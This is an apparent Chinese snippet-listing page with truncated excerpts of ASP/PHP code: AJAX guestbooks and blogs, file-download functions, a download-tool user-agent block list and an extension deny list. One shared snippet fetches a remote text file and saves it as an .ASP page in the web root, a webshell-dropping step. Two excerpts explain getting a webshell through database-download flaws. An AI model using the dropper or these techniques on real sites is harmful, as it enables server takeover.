一、说明 大家好,现将51AJAX的留言板源码放出,有PHP和ASP两个版本。 PHP版基于AJAX+PHP4.3+MySql 4.1+Dojo 0.3,ASP版基于AJAX+ASP+Access+Dojo 0.3。 压缩包中已包含了Dojo框架的主文件dojo.js,无需再下载Dojo包; 要下载完整的Dojo框架,请点击这里下载:http://download.dojotoolkit.org/release-0.3.1/dojo-0.3.1-ajax.zip。 关于Dojo的更多信息,请点击这里查看:http://www.51ajax.com/blog/?p=...
输入歌名自动会自动联想歌名读取音乐地址时,背景变暗不可操作同步LRC歌词显示,用户可自己进行扩展,整合音乐站mp3.asp 代码如下:<%@ language="vbscript" CodePage="936"%> <% response.charset="gb2312" set regex = New regexp regex.IgnoreCase=True regex.Global=True songname=unescape(query("songname")) Select Case query("s") case"geturl":echo geturl(songname) case"suggest":echo suggest() End select Func...
主要功能:BLOG日历,发表日志,添加管理分类,管理日志分类,编辑日志分类,可使用所见即所得方式(即双击直接编辑)后台仿GMAIL后台,大部分功能跟普通BLOG差不多,主要全部采用了AJAX,服务端采用ASP 本程序还配套一个AJAX 聊天室。程序共用四个主文件:客户端:前台:index.htm 后台:admin.htm服务端:前台:lib.asp 后台:admin.asp后台登陆管理:admin.htm 管理员和密码均为:admin本地下载
今天在网上看到一位叫“天下无双”的网友写的留言本,其中有些功能很不错哦!比如“插入运行代码”,“”.... 本地下载
作为脚本漏洞的头号杀手锏——数据库下载漏洞,现在已经被越来越多的人所熟知。在这个信息化技术更新飞快的时代,漏洞产生后随之而来的就是各种应对 的招数,比如改数据库的后缀、修改数据库的名字等等。很多人以为只要这么做就可以解决问题了,但事实往往不如你我所愿,即使你这么做了也难逃被高手攻击的 命运。为此我们有必要去了解一些攻击的手法,来增强自己的安全技能。 1.强制下载后缀名为ASP、ASA的数据库文件 大多数的网管...
图片不进行处理,图片默认是用浏览器打开显示,如果希望图片变为下载可以使用以下代码 function downloadFile(strFile)strFilename = server.MapPath(strFile)Response.Buffer = TrueResponse.ClearSet s = Server.CreateObject("ADODB.Stream")s.Opens.Type = 1on error resume nextSet fso = Server.CreateObject("Scripting.FileSystemObject")if not fso.FileExists(strFilename) thenResponse.Write("<h1>Error:</h1>" & strF...
通过Response.Flush()实现对服务端文件的下载时,会失败,不能正常弹出IE下载框,经过测试发现需要进行如下设置后即可解决。 进入 【工具】--->【Internet选项】--->【安全】--->【可信任站点】 文件下载的自动提示改成启用即可解决问题 当然得把访问的网站加入到信任站点才行。
分享一下 在3est活动中学习的godlong的 代码如下:<% Set xPost = createObject("Microsoft.XMLHTTP") xPost.Open "GET","http://www.gxlsystem.com/1.txt",0 下载文件的地址 xPost.Send() Set sGet = createObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseBody) sGet.SaveToFile "E:\WWWROOT\fuck1.ASP",2 %>
问题:我想上传文件时后改名,下载时又将名改回来。 如:我上传一张“我的照片.jpg”上传后改为系统数名“20040302001.jpg”下载时又改回“我的照片.jpg” 其中的保存新旧文件名都用数据库(已做) 就是下载时的改名做不出来。 代码: 代码如下:<% function dl(f,n) on error resume next Set S=CreateObject( "Adodb.Stream ") S.Mode=3 S.Type=1 S.Open S.LoadFromFile(f) if Err.Number> 0 then Response.Status= "404 " else ...
先不说直接改后缀,直接可以用网快等工具直接下载,其实这样你已经是为入侵者打开了大门。入侵者可以利用asp/asa为后缀的数据库直接得到webshell。 一.思路 大家都知道<%%>为asp文件的标志符,也就是说一个asp文件只会去执行<%%>之间的代码,access+asp的web系统的所有数据都是存放在数据库文件里(mdb文件),由于管理者把mdb文件改为了asp文件,如果我们提交的数据里包含有<%%>,那当我们访问这个asp数据库的时候就会...
代码如下:<% FunctIon DownloadFIle(StrFIle) StrFIlename=StrFIle Response.Buffer=True Response.Clear Set S=Server.CreateObJect("ADODB.Stream") S.Open S.Type=1 on Error Resume Next Set Fso=Server.CreateObJect("ScrIptIng.FIleSystemObJect") If Not Fso.FIleExists(StrFIleName) Then From_Url=Cstr(Request.ServerVarIables("HTTP_REFERER")) Serv_Url=Cstr(Request.ServerVarIables("SERVER_NAME")) If MId(From_Url...
代码如下:<% 屏蔽主流的下载工具 Dimxurl,xtool 获取浏览器AGENT xurl=lcase(Request.ServerVariables("HTTP_USER_AGENT")) 定义禁止的AGENT,下面5个包含最新版的快车,旋风和迅雷部分版本,可以自行添加! xtool="mozilla/4.0(compatible;msie5.00;windows98)"&_ "mozilla/4.0(compatible;msie6.0;windows+nt5.0)"&_ "mozilla/4.0(compatible;msie6.0;windowsnt5.1;)"&_ "mozilla/4.0(compatible;msie6.0;windowsnt5.0;.netclr1....
<%@ language=vbscript codepage=65001%> <% 'Filename must be input if Request("Filename")="" then response.write "<h1>Error:</h1>Filename is empty!<p>" else call downloadFile(replace(replace(Request("Filename"),"\",""),"/","")) Function downloadFile(strFile) ' make sure you are on the latest MDAC version for this to work ' get full path of specified file strFilename = server.MapPath(strFile) ' clea...
格式:Download.asp?FileName=要下载的文件名 代码如下:Dim Stream Dim Contents Dim FileName Dim FileExt Const adTypeBinary = 1 FileName = Request.QueryString("FileName") if FileName = "" Then Response.Write "无效文件名." Response.End End if ' 下面是不希望下载的文件 FileExt = Mid(FileName, InStrRev(FileName, ".") + 1) Select Case UCase(FileExt) Case "ASP", "ASA", "ASPX", "ASAX", "MDB" Response.Write ...
<%@ Language=VBScript %> <% Option Explicit %> <!--#include file="asptar.asp"--> <% Response.Buffer = True Response.Clear Dim Co,Temp,T,x,i,fsoBrowse,theFolder,TheSubFolders,FilePath,s,PH,objTar Co=0 PH="./UpFile" '文件路径 '压缩Upfile下的所有文件 Set objTar = New Tarball objTar.TarFilename="LvBBS_UpdateFile.rar" '打包的名称 objTar.Path=PH set fsoBrowse=CreateObject("Scripting.FileSys...